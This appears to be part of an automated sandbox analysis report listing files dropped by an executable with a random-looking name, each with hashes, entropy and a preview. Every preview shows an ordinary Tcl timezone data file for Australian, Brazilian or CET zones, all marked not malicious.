                                                                                                                                                                                                                              SSDEEP:96:pmz39IyKxb/JbcD9gKniAF23QbNS1fEGXALNbbT2JFJ/FaKaTQ9ZJhRVK:p+cpVKniAF2AbkFKL
                                                                                                                                                                                                                              MD5:10F983F4683CDE13A1228AC0B04D8513
                                                                                                                                                                                                                              SHA1:45378BA5949BE53D698108F50FECFF50C9E3D296
                                                                                                                                                                                                                              SHA-256:76D1F1ED67B8F8D6903789C2FDDF79590A83677972D416F5F3C9687614EC6238
                                                                                                                                                                                                                              SHA-512:D60D802EF215A33750E4F859657BA12A67084B1E9FCF1B4A7CEEE7B9D816BC2C6670775D93C88EC8380CDD7790AD574133D6F90F0828F848313C26583B2F196A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Lord_Howe) {.. {-9223372036854775808 38180 0 LMT}.. {-2364114980 36000 0 AEST}.. {352216800 37800 0 +1030}.. {372785400 41400 1 +1030}.. {384273000 37800 0 +1030}.. {404839800 41400 1 +1030}.. {415722600 37800 0 +1030}.. {436289400 41400 1 +1030}.. {447172200 37800 0 +1030}.. {467739000 41400 1 +1030}.. {478621800 37800 0 +1030}.. {488984400 37800 0 +1030}.. {499188600 39600 1 +1030}.. {511282800 37800 0 +1030}.. {530033400 39600 1 +1030}.. {542732400 37800 0 +1030}.. {562087800 39600 1 +1030}.. {574786800 37800 0 +1030}.. {594142200 39600 1 +1030}.. {606236400 37800 0 +1030}.. {625591800 39600 1 +1030}.. {636476400 37800 0 +1030}.. {657041400 39600 1 +1030}.. {667926000 37800 0 +1030}.. {688491000 39600 1 +1030}.. {699375600 37800 0 +1030}.. {719940600 39600 1 +1030}.. {731430000 37800 0 +1030}.. {751995000 39600 1 +1030}.. {762
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8341
                                                                                                                                                                                                                              Entropy (8bit):3.8532171550973526
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Yyigkp2EUyn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:Yy3VnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:40D06B80A4A0DB415270EFD9698B97BF
                                                                                                                                                                                                                              SHA1:1999F0E8C7EBAA11BD21D64D9E07FA911F13C64C
                                                                                                                                                                                                                              SHA-256:F21B9EA51C0D41BAD0420FE0601E5A4B491FB895856F4BDDF6541D704469D92F
                                                                                                                                                                                                                              SHA-512:E47D597CC85D177CF2804C44C216EB4C5B74472457F15F697704311A847BF8A051DCAFD26FA61DD689555F35640151E26F25D5DC5319EFEFEA62AD86657A4A95
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Melbourne) {.. {-9223372036854775808 34792 0 LMT}.. {-2364111592 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.893713405897538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjLkXHAIgoXjLyFvHRL/2QWCCjREeQWCCjLBn:SlSWB9vsM3yI9kHAIgmON/2DC5eDCyB
                                                                                                                                                                                                                              MD5:80B7CDD1EA5A5308CE84C038180005F2
                                                                                                                                                                                                                              SHA1:B7CA15B58ADA8CA3EB74B7971073022D57D8EE70
                                                                                                                                                                                                                              SHA-256:73D7C9E207E61ACF8DF7242BDCD84488189033E22A84873A953B65DE02FA1B0B
                                                                                                                                                                                                                              SHA-512:F627F5FF335600AC9158D6A0D3694AB7E70180177449C17B5605BBF7B1B7F8FB447A9C207F4E1BCB627074DB47B8A66F5D78E03C6DB8FA17F8BDD6AABB331665
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Sydney)]} {.. LoadTimeZoneFile Australia/Sydney..}..set TZData(:Australia/NSW) $TZData(:Australia/Sydney)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.830368875485429
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjbvvXHAIgoXjbBvRL/2QWCCjsrQWCCjbi:SlSWB9vsM3yIFHAIg2N/2DCZrDCl
                                                                                                                                                                                                                              MD5:14CB7EA1C028F457345EBEB8ADDC9237
                                                                                                                                                                                                                              SHA1:208BF676F56533BA271D1B98363A766DF17CF6F2
                                                                                                                                                                                                                              SHA-256:A983C9CAD7E542CAED43B083E68CD2B782959A4B54015F374C29250D3ACF9B8D
                                                                                                                                                                                                                              SHA-512:099F65E5FA705FD7257CF7B8E103905EE313C6D082844F69CCD3F318E3E7F4098B29F952FA0AA28655E1FE290A0FB2E809911088315889DE7CAAF0E04698C2FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Darwin)]} {.. LoadTimeZoneFile Australia/Darwin..}..set TZData(:Australia/North) $TZData(:Australia/Darwin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):739
                                                                                                                                                                                                                              Entropy (8bit):4.31793586514766
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB8623mdHCBdCvmlXz6zezzOz4iaLYvzkzi4zm5fVcBhg8mfev:53eCB0v4+e3Oz4iaLYbkzi4zxhfqw
                                                                                                                                                                                                                              MD5:01B1A88867472AD60B8F5C0E1648E3ED
                                                                                                                                                                                                                              SHA1:9975EA750458E8061DD8A83585675CB7E4910CA6
                                                                                                                                                                                                                              SHA-256:FC1B54CA261074E47A8A486FEAC12DD04D46166D1D2B44163BD8791BEC32D275
                                                                                                                                                                                                                              SHA-512:20BDFBCD1A5038C81552EBD955F3921DE3447A1F30E64935937768B2B98735AE53049601DCDD2D519646C78E6D03289EB465CFF4F2DADEA7D89A329504C6C475
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Perth) {.. {-9223372036854775808 27804 0 LMT}.. {-2337925404 28800 0 AWST}.. {-1672552800 32400 1 AWDT}.. {-1665381600 28800 0 AWST}.. {-883634400 32400 1 AWDT}.. {-876117600 28800 0 AWST}.. {-860392800 32400 1 AWDT}.. {-844668000 28800 0 AWST}.. {-836470800 32400 0 AWST}.. {152042400 32400 1 AWDT}.. {162928800 28800 0 AWST}.. {436298400 32400 1 AWDT}.. {447184800 28800 0 AWST}.. {690314400 32400 1 AWDT}.. {699386400 28800 0 AWST}.. {1165082400 32400 1 AWDT}.. {1174759200 28800 0 AWST}.. {1193508000 32400 1 AWDT}.. {1206813600 28800 0 AWST}.. {1224957600 32400 1 AWDT}.. {1238263200 28800 0 AWST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.803539644461131
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIaWhSHAIgPWAvN/2DCoRWJvFBx+DC7WN:MByMjL9t2rOvFel
                                                                                                                                                                                                                              MD5:401B6B2E30EF17BE20212645287EB94B
                                                                                                                                                                                                                              SHA1:67D15A45C61122CE680B829FE0FA3A1C501A8C8F
                                                                                                                                                                                                                              SHA-256:DDA669B9BFB3E08FC23CE67030148B9E4740824ADD8DE02580D6AFD31CE05BAB
                                                                                                                                                                                                                              SHA-512:F4348F8F4FF261C47854725AEE4E14E7E334B3C31496E5C46B0E0041551CB6861380E684E8888AFE9DA7E8E97236AC322B9CE2738EF245E9D46C9681665F83A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Brisbane)]} {.. LoadTimeZoneFile Australia/Brisbane..}..set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):198
                                                                                                                                                                                                                              Entropy (8bit):4.752918480727309
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIDRpGSHAIgSRrN/2DCa7QDCuRpyn:MByMjdpQYrt23QHpy
                                                                                                                                                                                                                              MD5:D226A0718185854DFE549E00856AA8D5
                                                                                                                                                                                                                              SHA1:94EE96FAE259D90C2FDF169DD95BD82B3171FFAE
                                                                                                                                                                                                                              SHA-256:D9DCFDC377901EC0C0FEB9CEA743C2C1425273F69A1BAA7BF3B74FEC5885B267
                                                                                                                                                                                                                              SHA-512:7EE29A7235CAAEF4889246B7A2241CA9A0D5D2B2E1D56B20141247C93B8736F17280F0D46004AC4588E137D1E76F661C779C906BBFC2B5F8FA73C19F7657F952
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Adelaide)]} {.. LoadTimeZoneFile Australia/Adelaide..}..set TZData(:Australia/South) $TZData(:Australia/Adelaide)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8338
                                                                                                                                                                                                                              Entropy (8bit):3.847525715050911
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:AZJigk42/yn8/dnQiAmcO38EJ8i/V9cYgCqMEjKeIZ3wQb25Ly04:AZJuVnQiAmcOM6e0pj
                                                                                                                                                                                                                              MD5:C0F1776E011C4C86B7709A592E7CA1EB
                                                                                                                                                                                                                              SHA1:1CA528D529BF4995E145D6E0D87A8752A3577E7F
                                                                                                                                                                                                                              SHA-256:FC453486325ADE1D31F14087B76D4936F3A6D551ABD1DB6FCAC129BDB043951C
                                                                                                                                                                                                                              SHA-512:F872182962C2615A35F012ECAB30C88F07C6BEF0261207AD52706DB22D8CDD0DA65723CD801FDA7C548C5EB0ECFC39DD66CC17503BAA3BBB77BFA35D20650E4F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Australia/Sydney) {.. {-9223372036854775808 36292 0 LMT}.. {-2364113092 36000 0 AEST}.. {-1672560000 39600 1 AEDT}.. {-1665388800 36000 0 AEST}.. {-883641600 39600 1 AEDT}.. {-876124800 36000 0 AEST}.. {-860400000 39600 1 AEDT}.. {-844675200 36000 0 AEST}.. {-828345600 39600 1 AEDT}.. {-813225600 36000 0 AEST}.. {31500000 36000 0 AEST}.. {57686400 39600 1 AEDT}.. {67968000 36000 0 AEST}.. {89136000 39600 1 AEDT}.. {100022400 36000 0 AEST}.. {120585600 39600 1 AEDT}.. {131472000 36000 0 AEST}.. {152035200 39600 1 AEDT}.. {162921600 36000 0 AEST}.. {183484800 39600 1 AEDT}.. {194976000 36000 0 AEST}.. {215539200 39600 1 AEDT}.. {226425600 36000 0 AEST}.. {246988800 39600 1 AEDT}.. {257875200 36000 0 AEST}.. {278438400 39600 1 AEDT}.. {289324800 36000 0 AEST}.. {309888000 39600 1 AEDT}.. {320774400 36000 0 AEST}.. {341337600 39600 1 AEDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):195
                                                                                                                                                                                                                              Entropy (8bit):4.777331394201868
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yI4DVJHAIgxnvVWAN/2DC3neDCVDy:MByMjUQVv8At2+eKy
                                                                                                                                                                                                                              MD5:9C58D9EFBB03472BBDA76CE2FFAD4BB4
                                                                                                                                                                                                                              SHA1:30959E3681B64AE26F7FA3957887896C26AF7F19
                                                                                                                                                                                                                              SHA-256:C94FA7A7640CD00963EE8FF1A3D9DCDA2075408739D998EDBF7CFC998DB764FD
                                                                                                                                                                                                                              SHA-512:2D6B778217726691F2CB4A4995A8B1AB08DDB7FE4570A3FD04EF54F718F455EF3CBD4EEF1A1BCC99A2088C82A6E89DB455BAF1327CECD6BF608837E50F14A6C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Hobart)]} {.. LoadTimeZoneFile Australia/Hobart..}..set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.818875198673406
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIvFfkSHAIgoFNNvN/2DCzyQDCMF4:MByMj9fKaNNvt2xQz4
                                                                                                                                                                                                                              MD5:0B144A2E47C81354BC510BC741DE5150
                                                                                                                                                                                                                              SHA1:A7396F1741F02C6C208FD1286362E4E0720198B8
                                                                                                                                                                                                                              SHA-256:DBEF9C5BDD290FEC5FA740D697143332D3CA1FC373CF1DF736F1883AC9BA3298
                                                                                                                                                                                                                              SHA-512:562B029591F9ADB8C324BA56E849B2B524E91B26D3DB441510194882A8E1E63E6948D041874A00A0A76F29925A1CEAC53DD2AE5D7F23123B6FE919346CBFD8CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Melbourne)]} {.. LoadTimeZoneFile Australia/Melbourne..}..set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.831654343064909
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq/xJjXFeyXHAIgoXjrWARL/2QWCCjH0QWCCjQ:SlSWB9vsM3yInHAIgOWAN/2DC00DCt
                                                                                                                                                                                                                              MD5:5F5916CB038876BE27AA5E2AD74EE085
                                                                                                                                                                                                                              SHA1:18AC21B638188B542455BA3DA91F958DF1724E68
                                                                                                                                                                                                                              SHA-256:75ABB7F20C4A0B618138AA190AF33CEAF2A6D2C707DA6C1314E4BFF2F9904F58
                                                                                                                                                                                                                              SHA-512:ADFD83E292AC1BB5E19255A9B2DA0E3BB9323A5F9B92D458DE34C291D7F9B6CFBBF62AA3351FB320E54F34305DD485ADC72134D21AFA6A27B2B8B7D93DCA2113
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Perth)]} {.. LoadTimeZoneFile Australia/Perth..}..set TZData(:Australia/West) $TZData(:Australia/Perth)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):212
                                                                                                                                                                                                                              Entropy (8bit):4.918079927018121
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3yIcKlHAIgJK3N/2DCkuM0DC9KM:MByMjcKeJK3t2kVSKM
                                                                                                                                                                                                                              MD5:BEDEA56FCE4B2F0A3F3E9319856A5560
                                                                                                                                                                                                                              SHA1:9FD0FE998A003C6B4CCCD00A977153347DE07F55
                                                                                                                                                                                                                              SHA-256:55A9264D0414644A1BE342106AE86086A6659596DC9322A74FC4D1DDB41F7C60
                                                                                                                                                                                                                              SHA-512:7C438B72262B99EDEEB31AC95E0135BB722A3B0B049278B6DE67DB5FB501837FB9C03785233B538E83F4B56104F6EA3B3DA0F7C2275E0F78F232161840AA4C63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Australia/Broken_Hill)]} {.. LoadTimeZoneFile Australia/Broken_Hill..}..set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):194
                                                                                                                                                                                                                              Entropy (8bit):4.888429541699473
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7thteSHAIgpth9RN/xWh490th4:MByMYdIp7tQ490I
                                                                                                                                                                                                                              MD5:A8A7A10DA4321819ED71F891480770F8
                                                                                                                                                                                                                              SHA1:930674EF7711542D7F471A59C1870D4576E027FD
                                                                                                                                                                                                                              SHA-256:2F594239A434052D36053A2B3EAB134EADBAD06EB6737E67CF72166DAB157537
                                                                                                                                                                                                                              SHA-512:C6AD1869A713DDE0E4DE53F7894E5CE0B7AEFDDD7C5C3D83BB5B92FB7D8E20B373A6694045053E1AE8EA98A7B7D0C052EF2C21310E47DC650A7A399A5F73D586
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Rio_Branco)]} {.. LoadTimeZoneFile America/Rio_Branco..}..set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.875339623736144
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wKy4oeyXHAIg20wKARL/1bIAJl0IAcGEwKyovn:SlSWB9vsM3y7/rDSHAIgp/AN/xIAE90j
                                                                                                                                                                                                                              MD5:E0D0EFBEC37E27532B49FF6DD9893DA0
                                                                                                                                                                                                                              SHA1:9C00993A885AF448E48201A46E17629A7A602FC6
                                                                                                                                                                                                                              SHA-256:A676562A90FF8587A775F6F0E3BE05D870456A56D25B5330816BF9043C8D475B
                                                                                                                                                                                                                              SHA-512:AB0E6907F9C0002CA5C050A0069AF013B14BADA08CA4553C96B302C078DF7629D5D7EDE4A19A53DEC6E7B9E6D9857F14EC7A1DB9BC11F2EEC9FFBAC70E129EEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Noronha)]} {.. LoadTimeZoneFile America/Noronha..}..set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                                              Entropy (8bit):4.948480276987682
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0tQJXveyXHAIg20tQJE6RL/1bJHIAcGEtQJXy:SlSWB9vsM3y7tIGSHAIgpt36N/xR90tF
                                                                                                                                                                                                                              MD5:FCCB5F44903E1B988A058E5BBF5E163B
                                                                                                                                                                                                                              SHA1:E1CC03DD4A804C7305D8B0C12D8451D08AE262EA
                                                                                                                                                                                                                              SHA-256:961FB3AB99A63B1E9704B737EAB2D588B5A39D253A213E175CC678BEDFFD498D
                                                                                                                                                                                                                              SHA-512:F31C80E4AD6EBE6CB8A3382E0052DC47601D073E8F81375D50241105675AA3AB45433FFD0534524D9992ABE1086C6671D85FF7C72B0D6766EB9984426F608B77
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Sao_Paulo)]} {.. LoadTimeZoneFile America/Sao_Paulo..}..set TZData(:Brazil/East) $TZData(:America/Sao_Paulo)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):182
                                                                                                                                                                                                                              Entropy (8bit):4.902113962502196
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0znQZF3vXHAIg20znQv5RL/1bbAWVIAcGEznQe:SlSWB9vsM3y7zn+PHAIgpznSN/xn90zN
                                                                                                                                                                                                                              MD5:9F4B43F4F27D0B7EAC0C5401A1A794B4
                                                                                                                                                                                                                              SHA1:2A8543B994E93E54BD50EAA78463905E6A8EBE74
                                                                                                                                                                                                                              SHA-256:0500C9A248C8CE9030EA30D0AF9DD95DC465480BAF60646C0B7C511FA23C6D1F
                                                                                                                                                                                                                              SHA-512:0ADAF708ACFBD80F4704951EEBC24AD144FD5856997A429279E804F3A7F7F9A8FED41DCEE85BFB1ECDBF1E05137E87E7430186474BCF5DE42067FFC74746F048
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Manaus)]} {.. LoadTimeZoneFile America/Manaus..}..set TZData(:Brazil/West) $TZData(:America/Manaus)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.7984816540097843
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:09+xKDBb0S274elPiIEtzsFpMbFNBwA3ybuNTjrjBDmE0DmiTcoYdNOMCsyZhlt7:9Ss41sFpM5vwA6Efv03TBZLl
                                                                                                                                                                                                                              MD5:6DB983AD72FB2A88FC557BE5E873336F
                                                                                                                                                                                                                              SHA1:C64E988010087ED559A990B3D95078949C9B4D72
                                                                                                                                                                                                                              SHA-256:E2AEA7CFD428A43D9DB938BCC476623ADC1250BD8057013A7FFF5F89D7FF8EFC
                                                                                                                                                                                                                              SHA-512:C0A646F80FB2FD42D9146A4FD36CF5A7F62016684F8D5AF80453EC190F4AEA65EDADC5BCF071AE746ABFB43B29C27B2743F2152B6986D41BFDE1617CA774A7C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:CET) {.. {-9223372036854775808 3600 0 CET}.. {-1693706400 7200 1 CEST}.. {-1680483600 3600 0 CET}.. {-1663455600 7200 1 CEST}.. {-1650150000 3600 0 CET}.. {-1632006000 7200 1 CEST}.. {-1618700400 3600 0 CET}.. {-938905200 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-828226800 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796777200 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766623600 3600 0 CET}.. {228877200 7200 1 CEST}.. {243997200 3600 0 CET}.. {260326800 7200 1 CEST}.. {276051600 3600 0 CET}.. {291776400 7200 1 CEST}.. {307501200 3600 0 CET}.. {323830800 7200 1 CEST}.. {338950800 3600 0 CET}.. {354675600 7200 1 CEST}.. {370400400 3600 0 CET}.. {386125200 7200 1 CEST}.. {401850000 3600 0 CET}.. {417574800 7200 1 CEST}.. {433299600 3600 0 CET}.. {449024400 7200 1 CEST}.. {465354000 3600 0 CET}.. {481078800 7200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8505
                                                                                                                                                                                                                              Entropy (8bit):3.8095769056779916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:e3HgahLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:eQaUqtfA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:A6F88C55E8613A27DE3E6C25B0672910
                                                                                                                                                                                                                              SHA1:3B593CC17BF153A6209FC5AACE7B88DA9603BD44
                                                                                                                                                                                                                              SHA-256:73A9841F233AA657AFB6CED8A86A37D55FE5582DD996B9B28975D218BCCC078F
                                                                                                                                                                                                                              SHA-512:526A922B1594A2800B03F363F7BFEC29203D4A4F2B49C5F2618469F59176CE4F8AFBA0616B226AC39D308DB05DE7147714D9B6CDBB2EA7373A041A4D47F50E2E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
